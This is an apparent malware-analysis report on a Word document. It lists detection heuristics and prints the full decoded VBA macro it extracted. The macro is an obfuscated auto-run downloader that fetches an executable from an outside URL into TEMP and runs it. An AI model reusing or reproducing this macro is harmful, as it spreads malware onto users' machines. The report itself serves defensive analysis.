MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros that are configured to execute automatically upon opening the document. The script attempts to download a payload from the obfuscated URL 'AhtXXtNpN:/NA/lNaNAwXmXaAtTe.XTcoNmA.XNauNN/XmXeNdXiTa/NdXoXcNuNmXTenTXtN.eXxXeT' and execute it. This behavior is indicative of a downloader or droppper malware.
Heuristics 5
-
ClamAV: Doc.Dropper.Agent-6425751-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6425751-0
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1892 bytes |
SHA-256: 9acf4e22fe17b167d5f07ad608ee7dd17219a5d4d1f130e6c0378198999d8f2c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "PIJUupnl"
Private Sub CaRIMuS(ByVal FfppmDZgoM As String)
bjSiit.hgbaqVAKm VtvPtzpL.WkzoLVUm, vqJJuWW.uCEIbxdxuK("BEixBecX", "B5XiJ"), FfppmDZgoM
End Sub
Private Sub nBErXsfyN(ByVal HOCYEItn As String, ByVal TQHBVkqqOj As String)
Set slicjDsKI = VtvPtzpL.trKHrrHdmg
slicjDsKI.Open vqJJuWW.uCEIbxdxuK("gGEiTi", "Mhgi"), HOCYEItn, False
bjSiit.ozbcEmC slicjDsKI, vqJJuWW.uCEIbxdxuK("FSewnadF", "WwFa")
GSxSJ TQHBVkqqOj, bjSiit.LjYhV(slicjDsKI, vqJJuWW.uCEIbxdxuK("iRefsffp/onEsEe/fBiodfyO", "3E/fOi"))
End Sub
Private Function ekMDRtX() As String
ekMDRtX = vqJJuWW.uCEIbxdxuK("AhtXXtNpN:/NA/lNaNAwXmXaAtTe.XTcoNmA.XNauNN/XmXeNdXiTa/NdXoXcNuNmXTenTXtN.eXxXeT", "TANX")
End Function
Public Sub rezAR()
xLnNsVsYCm
End Sub
Private Sub GSxSJ(ByVal TQHBVkqqOj As String, ByVal FDzxWTzaZc As Variant)
Set KMpjbdauI = VtvPtzpL.iOxSJWxSk
bjSiit.EvaBIWj KMpjbdauI, vqJJuWW.uCEIbxdxuK("TsHypPPe", "HdsP"), 1
bjSiit.ozbcEmC KMpjbdauI, vqJJuWW.uCEIbxdxuK("IOpzeIn9", "9Iz")
bjSiit.hgbaqVAKm KMpjbdauI, vqJJuWW.uCEIbxdxuK("WMnrQinteM", "nQM"), FDzxWTzaZc
bjSiit.WDwXs KMpjbdauI, vqJJuWW.uCEIbxdxuK("5Sanvne52ToVFVniVle2", "5Vn2"), TQHBVkqqOj, 2
bjSiit.ozbcEmC KMpjbdauI, vqJJuWW.uCEIbxdxuK("CZFlyosyeZ", "yFZ")
End Sub
Private Sub xLnNsVsYCm()
On Error GoTo onCTXsy
nBErXsfyN ekMDRtX, vlwLDCzR
CaRIMuS vlwLDCzR
Exit Sub
onCTXsy:
End Sub
Private Function NibRHUH(ByVal TnEfUs As String) As String
Set iutFHvNFRt = bjSiit.xoyJFqpa(VtvPtzpL.WkzoLVUm, vqJJuWW.uCEIbxdxuK("ExWnvBRirWBonBmRxexnRt", "BxRW"), vqJJuWW.uCEIbxdxuK("Pq RkOC ESkqS", "Yqwk "))
NibRHUH = iutFHvNFRt(TnEfUs)
End Function
Private Function vlwLDCzR() As String
vlwLDCzR = NibRHUH(vqJJuWW.uCEIbxdxuK("TXZEwMXP", "ZXw")) & qhQxUWxSR
End Function
Private Function qhQxUWxSR() As String
qhQxUWxSR = vqJJuWW.uCEIbxdxuK("/DcJaDD5nfN9bJD9en1nJ3aJaND7nc.NenJxen", "JDnN")
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.